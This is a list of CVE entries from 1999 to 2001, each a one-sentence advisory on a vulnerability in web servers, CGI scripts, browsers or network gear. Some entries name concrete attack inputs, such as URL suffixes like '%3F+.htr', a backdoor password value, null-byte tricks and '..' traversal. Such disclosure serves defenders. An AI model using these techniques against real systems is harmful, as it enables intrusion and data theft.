[CVE-2001-0004] IIS 5.0 and 4.0 allows remote attackers to read the source code for executable web server programs by appending "%3F+.htr" to the requested URL, which causes the files to be parsed by the .HTR ISAPI extension, aka a variant of the "File Fragment Reading via .HTR" vulnerability.
[CVE-2001-0003] Web Extender Client (WEC) in Microsoft Office 2000, Windows 2000, and Windows Me does not properly process Internet Explorer security settings for NTLM authentication, which allows attackers to obtain NTLM credentials and possibly obtain the password, aka the "Web Client NTLM Authentication" vulnerability.
[CVE-2000-1239] The HTTP interface of Tivoli Lightweight Client Framework (LCF) in IBM Tivoli Management Framework 3.7.1 sets http_disable to zero at install time, which allows remote authenticated users to bypass file permissions on Tivoli Endpoint Configuration data files via an unspecified manipulation of log files.
[CVE-2000-1238] BEA Systems WebLogic Express and WebLogic Server 5.1 SP1-SP6 allows remote attackers to bypass access controls for restricted JSP or servlet pages via a URL with multiple / (forward slash) characters before the restricted pages.
[CVE-2000-1230] Backdoor in auth.php3 in Phorum 3.0.7 allows remote attackers to access restricted web pages via an HTTP request with the PHP_AUTH_USER parameter set to "boogieman".
[CVE-2000-1225] Xitami 2.5b installs the testcgi.exe program by default in the cgi-bin directory, which allows remote attackers to gain sensitive configuration information about the web server by accessing the program.
[CVE-2000-1205] Cross site scripting vulnerabilities in Apache 1.3.0 through 1.3.11 allow remote attackers to execute script as other web site visitors via (1) the printenv CGI (printenv.pl), which does not encode its output, (2) pages generated by the ap_send_error_response function such as a default 404, which does not add an explicit charset, or (3) various messages that are generated by certain Apache modules or core code. NOTE: the printenv issue might still exist for web browsers that can render text/plain content types as HTML, such as Internet Explorer, but CVE regards this as a design limitation of those browsers, not Apache. The printenv.pl/acuparam vector, disclosed on 20070724, is one such variant.
[CVE-2000-1170] Buffer overflow in Netsnap webcam HTTP server before 1.2.9 allows remote attackers to execute arbitrary commands via a long GET request.
[CVE-2000-1166] Twig webmail system does not properly set the "vhosts" variable if it is not configured on the site, which allows remote attackers to insert arbitrary PHP (PHP3) code by specifying an alternate vhosts as an argument to the index.php3 program.
[CVE-2000-1161] The installation of AdCycle banner management system leaves the build.cgi program in a web-accessible directory, which allows remote attackers to execute the program and view passwords or delete databases.
[CVE-2000-1155] RHDaemon in RobinHood 1.1 web server in BeOS r5 pro and earlier allows remote attackers to cause a denial of service via long HTTP request.
[CVE-2000-1154] RHConsole in RobinHood 1.1 web server in BeOS r5 pro and earlier allows remote attackers to cause a denial of service via long HTTP request.
[CVE-2000-1131] Bill Kendrick web site guestbook (GBook) allows remote attackers to execute arbitrary commands via shell metacharacters in the _MAILTO form variable.
[CVE-2000-1130] McAfee WebShield SMTP 4.5 allows remote attackers to bypass email content filtering rules by including Extended ASCII characters in name of the attachment.
[CVE-2000-1129] McAfee WebShield SMTP 4.5 allows remote attackers to cause a denial of service via a malformed recipient field.
[CVE-2000-1118] 24Link 1.06 web server allows remote attackers to bypass access restrictions by prepending strings such as "/+/" or "/." to the HTTP GET request.
[CVE-2000-1117] The Extended Control List (ECL) feature of the Java Virtual Machine (JVM) in Lotus Notes Client R5 allows malicious web site operators to determine the existence of files on the client by measuring delays in the execution of the getSystemResource method.
[CVE-2000-1115] Buffer overflow in remote web administration component (webprox.dll) of 602Pro LAN SUITE before 2000.0.1.33 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
[CVE-2000-1110] document.d2w CGI program in the IBM Net.Data db2www package allows remote attackers to determine the physical path of the web server by sending a nonexistent command to the program.
[CVE-2000-1105] The ixsso.query ActiveX Object is marked as safe for scripting, which allows malicious web site operators to embed a script that remotely determines the existence of files on visiting Windows 2000 systems that have Indexing Services enabled.
[CVE-2000-1104] Variant of the "IIS Cross-Site Scripting" vulnerability as originally discussed in MS:MS00-060 (CVE-2000-0746) allows a malicious web site operator to embed scripts in a link to a trusted site, which are returned without quoting in an error message back to the client. The client then executes those scripts in the same context as the trusted site.
[CVE-2000-1100] The default configuration for PostACI webmail system installs the /includes/global.inc configuration file within the web root, which allows remote attackers to read sensitive information such as database usernames and passwords via a direct HTTP GET request.
[CVE-2000-1098] The web server for the SonicWALL SOHO firewall allows remote attackers to cause a denial of service via an empty GET or POST request.
[CVE-2000-1097] The web server for the SonicWALL SOHO firewall allows remote attackers to cause a denial of service via a long username in the authentication page.
[CVE-2000-1078] ICQ Web Front HTTPd allows remote attackers to cause a denial of service by requesting a URL that contains a "?" character.
[CVE-2000-1077] Buffer overflow in the SHTML logging functionality of iPlanet Web Server 4.x allows remote attackers to execute arbitrary commands via a long filename with a .shtml extension.
[CVE-2000-1070] pollit.cgi in Poll It 2.01 and earlier uses data files that are located under the web document root, which allows remote attackers to access sensitive or private information.
[CVE-2000-1061] Microsoft Virtual Machine (VM) in Internet Explorer 4.x and 5.x allows an unsigned applet to create and use ActiveX controls, which allows a remote attacker to bypass Internet Explorer's security settings and execute arbitrary commands via a malicious web page or email, aka the "Microsoft VM ActiveX Component" vulnerability.
[CVE-2000-1050] Allaire JRun 3.0 http servlet server allows remote attackers to directly access the WEB-INF directory via a URL request that contains an extra "/" in the beginning of the request (aka the "extra leading slash").
[CVE-2000-1036] Directory traversal vulnerability in Extent RBS ISP web server allows remote attackers to read sensitive information via a .. (dot dot) attack on the Image parameter.
[CVE-2000-1032] The client authentication interface for Check Point Firewall-1 4.0 and earlier generates different error messages for invalid usernames versus invalid passwords, which allows remote attackers to identify valid usernames on the firewall.
[CVE-2000-1030] CS&T CorporateTime for the Web returns different error messages for invalid usernames and invalid passwords, which allows remote attackers to determine valid usernames on the server.
[CVE-2000-1021] Heap overflow in WebConfig in Mdaemon 3.1.1 and earlier allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long URL.
[CVE-2000-1017] Webteachers Webdata allows remote attackers with valid Webdata accounts to read arbitrary files by posting a request to import the file into the WebData database.
[CVE-2000-1005] Directory traversal vulnerability in html_web_store.cgi and web_store.cgi CGI programs in eXtropia WebStore allows remote attackers to read arbitrary files via a .. (dot dot) attack on the page parameter.
[CVE-2000-0988] WinU 1.0 through 5.1 has a backdoor password that allows remote attackers to gain access to its administrative interface and modify configuration.
[CVE-2000-0982] Internet Explorer before 5.5 forwards cached user credentials for a secure web site to insecure pages on the same web site, which could allow remote attackers to obtain the credentials by monitoring connections to the web server, aka the "Cached Web Credentials" vulnerability.
[CVE-2000-0970] IIS 4.0 and 5.0 .ASP pages send the same Session ID cookie for secure and insecure web sessions, which could allow remote attackers to hijack the secure web session of the user if that user moves to an insecure session, aka the "Session ID Cookie Marking" vulnerability.
[CVE-2000-0964] Buffer overflow in the web administration service for the HiNet LP5100 IP-phone allows remote attackers to cause a denial of service and possibly execute arbitrary commands via a long GET request.
[CVE-2000-0958] HotJava Browser 3.0 allows remote attackers to access the DOM of a web page by opening a javascript: URL in a named window.
[CVE-2000-0951] A misconfiguration in IIS 5.0 with Index Server enabled and the Index property set allows remote attackers to list directories in the web root via a Web Distributed Authoring and Versioning (WebDAV) search.
[CVE-2000-0942] The CiWebHitsFile component in Microsoft Indexing Services for Windows 2000 allows remote attackers to conduct a cross site scripting (CSS) attack via a CiRestriction parameter in a .htw request, aka the "Indexing Services Cross Site Scripting" vulnerability.
[CVE-2000-0941] Kootenay Web KW Whois 1.0 CGI program allows remote attackers to execute arbitrary commands via shell metacharacters in the "whois" parameter.
[CVE-2000-0939] Samba Web Administration Tool (SWAT) in Samba 2.0.7 allows remote attackers to cause a denial of service by repeatedly submitting a nonstandard URL in the GET HTTP request and forcing it to restart.
[CVE-2000-0938] Samba Web Administration Tool (SWAT) in Samba 2.0.7 supplies a different error message when a valid username is provided versus an invalid name, which allows remote attackers to identify valid users on the server.
[CVE-2000-0937] Samba Web Administration Tool (SWAT) in Samba 2.0.7 does not log login attempts in which the username is correct but the password is wrong, which allows remote attackers to conduct brute force password guessing attacks.
[CVE-2000-0936] Samba Web Administration Tool (SWAT) in Samba 2.0.7 installs the cgi.log logging file with world readable permissions, which allows local users to read sensitive information such as user names and passwords.
[CVE-2000-0935] Samba Web Administration Tool (SWAT) in Samba 2.0.7 allows local users to overwrite arbitrary files via a symlink attack on the cgi.log file.
[CVE-2000-0922] Directory traversal vulnerability in Bytes Interactive Web Shopper shopping cart program (shopper.cgi) 2.0 and earlier allows remote attackers to read arbitrary files via a .. (dot dot) attack on the newpage parameter.
[CVE-2000-0920] Directory traversal vulnerability in BOA web server 0.94.8.2 and earlier allows remote attackers to read arbitrary files via a modified .. (dot dot) attack in the GET HTTP request that uses a "%2E" instead of a "."
[CVE-2000-0905] QNX Embedded Resource Manager in Voyager web server 2.01B in the demo disks for QNX 405 allows remote attackers to read sensitive system statistics information via the embedded.html web page.
[CVE-2000-0904] Voyager web server 2.01B in the demo disks for QNX 405 stores sensitive web client information in the .photon directory in the web document root, which allows remote attackers to obtain that information.
[CVE-2000-0903] Directory traversal vulnerability in Voyager web server 2.01B in the demo disks for QNX 405 allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0892] Some telnet clients allow remote telnet servers to request environment variables from the client that may contain sensitive information, or remote web servers to obtain the information via a telnet: URL.
[CVE-2000-0886] IIS 5.0 allows remote attackers to execute arbitrary commands via a malformed request for an executable file whose name is appended with operating system commands, aka the "Web Server File Request Parsing" vulnerability.
[CVE-2000-0884] IIS 4.0 and 5.0 allows remote attackers to read documents outside of the web root, and possibly execute arbitrary commands, via malformed URLs that contain UNICODE encoded characters, aka the "Web Server Folder Traversal" vulnerability.
[CVE-2000-0873] netstat in AIX 4.x.x does not properly restrict access to the -Zi option, which allows local users to clear network interface statistics and possibly hide evidence of unusual network activities.
[CVE-2000-0869] The default configuration of Apache 1.3.12 in SuSE Linux 6.4 enables WebDAV, which allows remote attackers to list arbitrary directories via the PROPFIND HTTP request method.
[CVE-2000-0862] Vulnerability in an administrative interface utility for Allaire Spectra 1.0.1 allows remote attackers to read and modify sensitive configuration information.
[CVE-2000-0859] The web configuration server for NTMail V5 and V6 allows remote attackers to cause a denial of service via a series of partial HTTP requests.
[CVE-2000-0848] Buffer overflow in IBM WebSphere web application server (WAS) allows remote attackers to execute arbitrary commands via a long Host: request header.
[CVE-2000-0842] The search97cgi/vtopic in the UnixWare 7 scohelphttp webserver allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0836] Buffer overflow in CamShot WebCam Trial2.6 allows remote attackers to execute arbitrary commands via a long Authorization header.
[CVE-2000-0830] annclist.exe in webTV for Windows allows remote attackers to cause a denial of service via a large, malformed UDP packet to ports 22701 through 22705.
[CVE-2000-0827] Buffer overflow in the web authorization form of Mobius DocumentDirect for the Internet 1.2 allows remote attackers to cause a denial of service or execute arbitrary commands via a long username.
[CVE-2000-0812] The administration module in Sun Java web server allows remote attackers to execute arbitrary commands by uploading Java code to the module and invoke the com.sun.server.http.pagecompile.jsp92.JspServlet by requesting a URL that begins with a /servlet/ tag.
[CVE-2000-0790] The web-based folder display capability in Microsoft Internet Explorer 5.5 on Windows 98 allows local users to insert Trojan horse programs by modifying the Folder.htt file and using the InvokeVerb method in the ShellDefView ActiveX control to specify a default execute option for the first file that is listed in the folder.
[CVE-2000-0787] IRC Xchat client versions 1.4.2 and earlier allows remote attackers to execute arbitrary commands by encoding shell metacharacters into a URL which XChat uses to launch a web browser.
[CVE-2000-0780] The web server in IPSWITCH IMail 6.04 and earlier allows remote attackers to read and delete arbitrary files via a .. (dot dot) attack.
[CVE-2000-0774] The sample Java servlet "test" in Bajie HTTP web server 0.30a reveals the real pathname of the web document root.
[CVE-2000-0773] Bajie HTTP web server 0.30a allows remote attackers to read arbitrary files via a URL that contains a "....", a variant of the dot dot directory traversal attack.
[CVE-2000-0769] O'Reilly WebSite Pro 2.3.7 installs the uploader.exe program with execute permissions for all users, which allows remote attackers to create and execute arbitrary files by directly calling uploader.exe.
[CVE-2000-0746] Vulnerabilities in IIS 4.0 and 5.0 do not properly protect against cross-site scripting (CSS) attacks. They allow a malicious web site operator to embed scripts in a link to a trusted site, which are returned without quoting in an error message back to the client. The client then executes those scripts in the same context as the trusted site, aka the "IIS Cross-Site Scripting" vulnerabilities.
[CVE-2000-0738] WebShield SMTP 4.5 allows remote attackers to cause a denial of service by sending e-mail with a From: address that has a . (period) at the end, which causes WebShield to continuously send itself copies of the e-mail.
[CVE-2000-0727] xpdf PDF viewer client earlier than 0.91 does not properly launch a web browser for embedded URL's, which allows an attacker to execute arbitrary commands via a URL that contains shell metacharacters.
[CVE-2000-0716] WorldClient email client in MDaemon 2.8 includes the session ID in the referer field of an HTTP request when the user clicks on a URL, which allows the visited web site to hijack the session ID and read the user's email.
[CVE-2000-0707] PCCS MySQLDatabase Admin Tool Manager 1.2.4 and earlier installs the file dbconnect.inc within the web root, which allows remote attackers to obtain sensitive information such as the administrative password.
[CVE-2000-0706] Buffer overflows in ntop running in web mode allows remote attackers to execute arbitrary commands.
[CVE-2000-0705] ntop running in web mode allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0700] Cisco Gigabit Switch Routers (GSR) with Fast Ethernet / Gigabit Ethernet cards, from IOS versions 11.2(15)GS1A up to 11.2(19)GS0.2 and some versions of 12.0, do not properly handle line card failures, which allows remote attackers to bypass ACLs or force the interface to stop forwarding packets.
[CVE-2000-0685] BEA WebLogic 5.1.x does not properly restrict access to the PageCompileServlet, which could allow remote attackers to compile and execute Java JHTML code by directly invoking the servlet on any source file.
[CVE-2000-0684] BEA WebLogic 5.1.x does not properly restrict access to the JSPServlet, which could allow remote attackers to compile and execute Java JSP code by directly invoking the servlet on any source file.
[CVE-2000-0683] BEA WebLogic 5.1.x allows remote attackers to read source code for parsed pages by inserting /*.shtml/ into the URL, which invokes the SSIServlet.
[CVE-2000-0682] BEA WebLogic 5.1.x allows remote attackers to read source code for parsed pages by inserting /ConsoleHelp/ into the URL, which invokes the FileServlet.
[CVE-2000-0681] Buffer overflow in BEA WebLogic server proxy plugin allows remote attackers to execute arbitrary commands via a long URL with a .JSP extension.
[CVE-2000-0671] Roxen web server earlier than 2.0.69 allows remote attackers to bypass access restrictions, list directory contents, and read source code by inserting a null character (%00) to the URL.
[CVE-2000-0670] The cvsweb CGI script in CVSWeb 1.80 allows remote attackers with write access to a CVS repository to execute arbitrary commands via shell metacharacters.
[CVE-2000-0660] The WDaemon web server for WorldClient 2.1 allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0652] IBM WebSphere allows remote attackers to read source code for executable web files by directly calling the default InvokerServlet using a URL which contains the "/servlet/file" string.
[CVE-2000-0649] IIS 4.0 allows remote attackers to obtain the internal IP address of the server via an HTTP 1.0 request for a web page which is protected by basic authentication and has no realm defined.
[CVE-2000-0643] Buffer overflow in WebActive HTTP Server 1.00 allows remote attackers to cause a denial of service via a long URL.
[CVE-2000-0642] The default configuration of WebActive HTTP Server 1.00 stores the web access log active.log in the document root, which allows remote attackers to view the logs by directly requesting the page.
[CVE-2000-0641] Savant web server allows remote attackers to execute arbitrary commands via a long GET request.
[CVE-2000-0639] The default configuration of Big Brother 1.4h2 and earlier does not include proper access restrictions, which allows remote attackers to execute arbitrary commands by using bbd to upload a file whose extension will cause it to be executed as a CGI script by the web server.
[CVE-2000-0632] Buffer overflow in the web archive component of L-Soft Listserv 1.8d and earlier allows remote attackers to execute arbitrary commands via a long query string.
[CVE-2000-0629] The default configuration of the Sun Java web server 2.0 and earlier allows remote attackers to execute arbitrary commands by uploading Java code to the server via board.html, then directly calling the JSP compiler servlet.
[CVE-2000-0626] Buffer overflow in Alibaba web server allows remote attackers to cause a denial of service via a long GET request.
[CVE-2000-0623] Buffer overflow in O'Reilly WebSite Professional web server 2.4 and earlier allows remote attackers to execute arbitrary commands via a long GET request or Referrer header.
[CVE-2000-0622] Buffer overflow in Webfind CGI program in O'Reilly WebSite Professional web server 2.x allows remote attackers to execute arbitrary commands via a URL containing a long "keywords" parameter.
[CVE-2000-0611] The default configuration of NetWin dMailWeb and cwMail trusts all POP servers, which allows attackers to bypass normal authentication and cause a denial of service.
[CVE-2000-0610] NetWin dMailWeb and cwMail 2.6g and earlier allows remote attackers to bypass authentication and use the server for mail relay via a username that contains a carriage return.
[CVE-2000-0609] NetWin dMailWeb and cwMail 2.6g and earlier allows remote attackers to cause a denial of service via a long username parameter.
[CVE-2000-0608] NetWin dMailWeb and cwMail 2.6i and earlier allows remote attackers to cause a denial of service via a long POP parameter (pophost).
[CVE-2000-0576] Oracle Web Listener for AIX versions 4.0.7.0.0 and 4.0.8.1.0 allows remote attackers to cause a denial of service via a malformed URL.
[CVE-2000-0571] LocalWEB HTTP server 1.2.0 allows remote attackers to cause a denial of service via a long GET request.
[CVE-2000-0569] Sybergen Sygate allows remote attackers to cause a denial of service by sending a malformed DNS UDP packet to its internal interface.
[CVE-2000-0564] The guestbook CGI program in ICQ Web Front service for ICQ 2000a, 99b, and others allows remote attackers to cause a denial of service via a URL with a long name parameter.
[CVE-2000-0563] The URLConnection function in MacOS Runtime Java (MRJ) 2.1 and earlier and the Microsoft virtual machine (VM) for MacOS allows a malicious web site operator to connect to arbitrary hosts using a HTTP redirection, in violation of the Java security model.
[CVE-2000-0561] Buffer overflow in WebBBS 1.15 allows remote attackers to execute arbitrary commands via a long HTTP GET request.
[CVE-2000-0552] ICQwebmail client for ICQ 2000A creates a world readable temporary file during login and does not delete it, which allows local users to obtain sensitive information.
[CVE-2000-0521] Savant web server allows remote attackers to read source code of CGI scripts via a GET request that does not include the HTTP version number.
[CVE-2000-0517] Netscape 4.73 and earlier does not properly warn users about a potentially invalid certificate if the user has previously accepted the certificate for a different web site, which could allow remote attackers to spoof a legitimate web site by compromising that site's DNS information.
[CVE-2000-0507] Imate Webmail Server 2.5 allows remote attackers to cause a denial of service via a long HELO command.
[CVE-2000-0503] The IFRAME of the WebBrowser control in Internet Explorer 5.01 allows a remote attacker to violate the cross frame security policy via the NavigateComplete2 event.
[CVE-2000-0500] The default configuration of BEA WebLogic 5.1.0 allows a remote attacker to view source code of programs by requesting a URL beginning with /file/, which causes the default servlet to display the file without further processing.
[CVE-2000-0499] The default configuration of BEA WebLogic 3.1.8 through 4.5.1 allows a remote attacker to view source code of a JSP program by requesting a URL which provides the JSP extension in upper case.
[CVE-2000-0497] IBM WebSphere server 3.0.2 allows a remote attacker to view source code of a JSP program by requesting a URL which provides the JSP extension in upper case.
[CVE-2000-0469] Selena Sol WebBanner 4.0 allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0448] The WebShield SMTP Management Tool version 4.5.44 does not properly restrict access to the management port when an IP address does not resolve to a hostname, which allows remote attackers to access the configuration via the GET_CONFIG command.
[CVE-2000-0447] Buffer overflow in WebShield SMTP 4.5.44 allows remote attackers to execute arbitrary commands via a long configuration parameter to the WebShield remote management service.
[CVE-2000-0444] HP Web JetAdmin 6.0 allows remote attackers to cause a denial of service via a malformed URL to port 8000.
[CVE-2000-0439] Internet Explorer 4.0 and 5.0 allows a malicious web site to obtain client cookies from another domain by including that domain name and escaped characters in a URL, aka the "Unauthorized Cookie Access" vulnerability.
[CVE-2000-0437] Buffer overflow in the CyberPatrol daemon "cyberdaemon" used in gauntlet and WebShield allows remote attackers to cause a denial of service or execute arbitrary commands.
[CVE-2000-0435] The allmanageup.pl file upload CGI script in the Allmanage Website administration software 2.6 can be called directly by remote attackers, which allows them to modify user accounts or web pages.
[CVE-2000-0434] The administrative password for the Allmanage web site administration software is stored in plaintext in a file which could be accessed by remote attackers.
[CVE-2000-0425] Buffer overflow in the Web Archives component of L-Soft LISTSERV 1.8 allows remote attackers to execute arbitrary commands.
[CVE-2000-0423] Buffer overflow in Netwin DNEWSWEB CGI program allows remote attackers to execute arbitrary commands via long parameters such as group, cmd, and utag.
[CVE-2000-0422] Buffer overflow in Netwin DMailWeb CGI program allows remote attackers to execute arbitrary commands via a long utoken parameter.
[CVE-2000-0417] The HTTP administration interface to the Cayman 3220-H DSL router allows remote attackers to cause a denial of service via a long username or password.
[CVE-2000-0416] NTMail 5.x allows network users to bypass the NTMail proxy restrictions by redirecting their requests to NTMail's web configuration server.
[CVE-2000-0406] Netscape Communicator before version 4.73 and Navigator 4.07 do not properly validate SSL certificates, which allows remote attackers to steal information by redirecting traffic from a legitimate web server to their own malicious server, aka the "Acros-Suencksen SSL" vulnerability.
[CVE-2000-0397] The EMURL web-based email account software encodes predictable identifiers in user session URLs, which allows a remote attacker to access a user's email account.
[CVE-2000-0396] The add.exe program in the Carello shopping cart software allows remote attackers to duplicate files on the server, which could allow the attacker to read source code for web scripts such as .ASP files.
[CVE-2000-0386] FileMaker Pro 5 Web Companion allows remote attackers to send anonymous or forged email.
[CVE-2000-0385] FileMaker Pro 5 Web Companion allows remote attackers to bypass Field-Level database security restrictions via the XML publishing or email capabilities.
[CVE-2000-0353] Pine 4.x allows a remote attacker to execute arbitrary commands via an index.html file which executes lynx and obtains a uudecoded file from a malicious web server, which is then executed by Pine.
[CVE-2000-0346] AppleShare IP 6.1 and later allows a remote attacker to read potentially sensitive information via an invalid range request to the web server.
[CVE-2000-0313] Vulnerability in OpenBSD 2.6 allows a local user to change interface media configurations.
[CVE-2000-0302] Microsoft Index Server allows remote attackers to view the source code of ASP files by appending a %20 to the filename in the CiWebHitsFile argument to the null.htw URL.
[CVE-2000-0299] Buffer overflow in WebObjects.exe in the WebObjects Developer 4.5 package allows remote attackers to cause a denial of service via an HTTP request with long headers such as Accept.
[CVE-2000-0292] The Adtran MX2800 M13 Multiplexer allows remote attackers to cause a denial of service via a ping flood to the Ethernet interface, which causes the device to crash.
[CVE-2000-0290] Buffer overflow in Webstar HTTP server allows remote attackers to cause a denial of service via a long GET request.
[CVE-2000-0289] IP masquerading in Linux 2.2.x allows remote attackers to route UDP packets through the internal interface by modifying the external source IP address and port number to match those of an established connection.
[CVE-2000-0282] TalentSoft webpsvr daemon in the Web+ shopping cart application allows remote attackers to read arbitrary files via a .. (dot dot) attack on the webplus CGI program.
[CVE-2000-0278] The SalesLogix Eviewer allows remote attackers to cause a denial of service by accessing the URL for the slxweb.dll administration program, which does not authenticate the user.
[CVE-2000-0261] The AVM KEN! web server allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0257] Buffer overflow in the NetWare remote web administration utility allows remote attackers to cause a denial of service or execute commands via a long URL.
[CVE-2000-0256] Buffer overflows in htimage.exe and Imagemap.exe in FrontPage 97 and 98 Server Extensions allow a user to conduct activities that are not otherwise available through the web site, aka the "Server-Side Image Map Components" vulnerability.
[CVE-2000-0251] HP-UX 11.04 VirtualVault (VVOS) sends data to unprivileged processes via an interface that has multiple aliased IP addresses.
[CVE-2000-0248] The web GUI for the Linux Virtual Server (LVS) software in the Red Hat Linux Piranha package has a backdoor password that allows remote attackers to execute arbitrary commands.
[CVE-2000-0239] Buffer overflow in the MERCUR WebView WebMail server allows remote attackers to cause a denial of service via a long mail_user parameter in the GET request.
[CVE-2000-0238] Buffer overflow in the web server for Norton AntiVirus for Internet Email Gateways allows remote attackers to cause a denial of service via a long URL.
[CVE-2000-0237] Netscape Enterprise Server with Web Publishing enabled allows remote attackers to list arbitrary directories via a GET request for the /publisher directory, which provides a Java applet that allows the attacker to browse the directories.
[CVE-2000-0236] Netscape Enterprise Server with Directory Indexing enabled allows remote attackers to list server directories via web publishing tags such as ?wp-ver-info and ?wp-cs-dump.
[CVE-2000-0209] Buffer overflow in Lynx 2.x allows remote attackers to crash Lynx and possibly execute commands via a long URL in a malicious web page.
[CVE-2000-0182] iPlanet Web Server 4.1 allows remote attackers to cause a denial of service via a large number of GET commands, which consumes memory and causes a kernel panic.
[CVE-2000-0175] Buffer overflow in StarOffice StarScheduler web server allows remote attackers to gain root access via a long GET command.
[CVE-2000-0174] StarOffice StarScheduler web server allows remote attackers to read arbitrary files via a .. (dot dot) attack.
[CVE-2000-0169] Batch files in the Oracle web listener ows-bin directory allow remote attackers to execute commands via a malformed URL that includes '?&'.
[CVE-2000-0161] Sample web sites on Microsoft Site Server 3.0 Commerce Edition do not validate an identification number, which allows remote attackers to execute SQL commands.
[CVE-2000-0156] Internet Explorer 4.x and 5.x allows remote web servers to access files on the client that are outside of its security domain, aka the "Image Source Redirect" vulnerability.
[CVE-2000-0153] FrontPage Personal Web Server (PWS) allows remote attackers to read files via a .... (dot dot) attack.
[CVE-2000-0149] Zeus web server allows remote attackers to view the source code for CGI programs via a null character (%00) at the end of a URL.
[CVE-2000-0146] The Java Server in the Novell GroupWise Web Access Enhancement Pack allows remote attackers to cause a denial of service via a long URL to the servlet.
[CVE-2000-0127] The Webspeed configuration program does not properly disable access to the WSMadmin utility, which allows remote attackers to gain privileges via wsisa.dll.
[CVE-2000-0124] surfCONTROL SuperScout does not properly assign a category to web sites with a . (dot) at the end, which may allow users to bypass web access restrictions.
[CVE-2000-0111] The RightFax web client uses predictable session numbers, which allows remote attackers to hijack user sessions.
[CVE-2000-0110] The WebSiteTool shopping cart application allows remote users to modify sensitive purchase information via hidden form fields.
[CVE-2000-0098] Microsoft Index Server allows remote attackers to determine the real path for a web directory via a request to an Internet Data Query file that does not exist.
[CVE-2000-0097] The WebHits ISAPI filter in Microsoft Index Server allows remote attackers to read arbitrary files, aka the "Malformed Hit-Highlighting Argument" vulnerability.
[CVE-2000-0094] procfs in BSD systems allows local users to gain root privileges by modifying the /proc/pid/mem interface via a modified file descriptor for stderr.
[CVE-2000-0082] WebTV email client allows remote attackers to force the client to send email without the user's knowledge via HTML.
[CVE-2000-0066] WebSite Pro allows remote attackers to determine the real pathname of webdirectories via a malformed URL request.
[CVE-2000-0057] Cold Fusion CFCACHE tag places temporary cache files within the web document root, allowing remote attackers to obtain sensitive system information.
[CVE-2000-0050] The Allaire Spectra Webtop allows authenticated users to access other Webtop sections by specifying explicit URLs.
[CVE-2000-0043] Buffer overflow in CamShot WebCam HTTP server allows remote attackers to execute commands via a long GET request.
[CVE-2000-0014] Denial of service in Savant web server via a null character in the requested URL.
[CVE-2000-0010] WebWho+ whois.cgi program allows remote attackers to execute commands via shell metacharacters in the TLD parameter.
[CVE-1999-1567] Seapine Software TestTrack server allows a remote attacker to cause a denial of service (high CPU) via (1) TestTrackWeb.exe and (2) ttcgi.exe by connecting to port 99 and disconnecting without sending any data.
[CVE-1999-1547] Oracle Web Listener 2.1 allows remote attackers to bypass access restrictions by replacing a character in the URL with its HTTP-encoded (hex) equivalent.
[CVE-1999-1531] Buffer overflow in IBM HomePagePrint 1.0.7 for Windows98J allows a malicious Web site to execute arbitrary code on a viewer's system via a long IMG_SRC HTML tag.
[CVE-1999-1525] Macromedia Shockwave before 6.0 allows a malicious webmaster to read a user's mail box and possibly access internal web servers via the GetNextText command on a Shockwave movie.
[CVE-1999-1523] Buffer overflow in Sambar Web Server 4.2.1 allows remote attackers to cause a denial of service, and possibly execute arbitrary commands, via a long HTTP GET request.
[CVE-1999-1522] Vulnerability in htmlparse.pike in Roxen Web Server 1.3.11 and earlier, possibly related to recursive parsing and referer tags in RXML.
[CVE-1999-1509] Directory traversal vulnerability in Etype Eserv 2.50 web server allows a remote attacker to read any file in the file system via a .. (dot dot) in a URL.
[CVE-1999-1508] Web server in Tektronix PhaserLink Printer 840.0 and earlier allows a remote attacker to gain administrator access by directly calling undocumented URLs such as ncl_items.html and ncl_subjects.html.
[CVE-1999-1473] When a Web site redirects the browser to another site, Internet Explorer 3.02 and 4.0 automatically resends authentication information to the second site, aka the "Page Redirect Issue."
[CVE-1999-1466] Vulnerability in Cisco routers versions 8.2 through 9.1 allows remote attackers to bypass access control lists when extended IP access lists are used on certain interfaces, the IP route cache is enabled, and the access list uses the "established" keyword.
[CVE-1999-1465] Vulnerability in Cisco IOS 11.1 through 11.3 with distributed fast switching (DFS) enabled allows remote attackers to bypass certain access control lists when the router switches traffic from a DFS-enabled input interface to an output interface with a logical subinterface, as described by Cisco bug CSCdk43862.
[CVE-1999-1464] Vulnerability in Cisco IOS 11.1CC and 11.1CT with distributed fast switching (DFS) enabled allows remote attackers to bypass certain access control lists when the router switches traffic from a DFS-enabled interface to an interface that does not have DFS enabled, as described by Cisco bug CSCdk35564.
[CVE-1999-1453] Internet Explorer 4 allows remote attackers (malicious web site operators) to read the contents of the clipboard via the Internet WebBrowser ActiveX object.
[CVE-1999-1423] ping in Solaris 2.3 through 2.6 allows local users to cause a denial of service (crash) via a ping request to a multicast address through the loopback interface, e.g. via ping -i.
[CVE-1999-1418] ICQ99 ICQ web server build 1701 with "Active Homepage" enabled allows remote attackers to determine the existence of files on the server by comparing server responses when a file exists ("404 Forbidden") versus when a file does not exist ("404 not found").
[CVE-1999-1417] Format string vulnerability in AnswerBook2 (AB2) web server dwhttpd 3.1a4 allows remote attackers to cause a denial of service and possibly execute arbitrary commands via encoded % characters in an HTTP request, which is improperly logged.
[CVE-1999-1416] AnswerBook2 (AB2) web server dwhttpd 3.1a4 allows remote attackers to cause a denial of service (resource exhaustion) via an HTTP POST request with a large content-length.
[CVE-1999-1380] Symantec Norton Utilities 2.0 for Windows 95 marks the TUNEOCX.OCX ActiveX control as safe for scripting, which allows remote attackers to execute arbitrary commands via the run option through malicious web pages that are accessed by browsers such as Internet Explorer 3.0.
[CVE-1999-1374] perlshop.cgi shopping cart program stores sensitive customer information in directories and files that are under the web root, which allows remote attackers to obtain that information via an HTTP request.
[CVE-1999-1367] Internet Explorer 5.0 does not properly reset the username/password cache for Web sites that do not use standard cache controls, which could allow users on the same system to access restricted web sites that were visited by other users.
[CVE-1999-1331] netcfg 2.16-1 in Red Hat Linux 4.2 allows the Ethernet interface to be controlled by users on reboot when an option is set, which allows local users to cause a denial of service by shutting down the interface.
[CVE-1999-1292] Buffer overflow in web administration feature of Kolban Webcam32 4.8.3 and earlier allows remote attackers to execute arbitrary commands via a long URL.
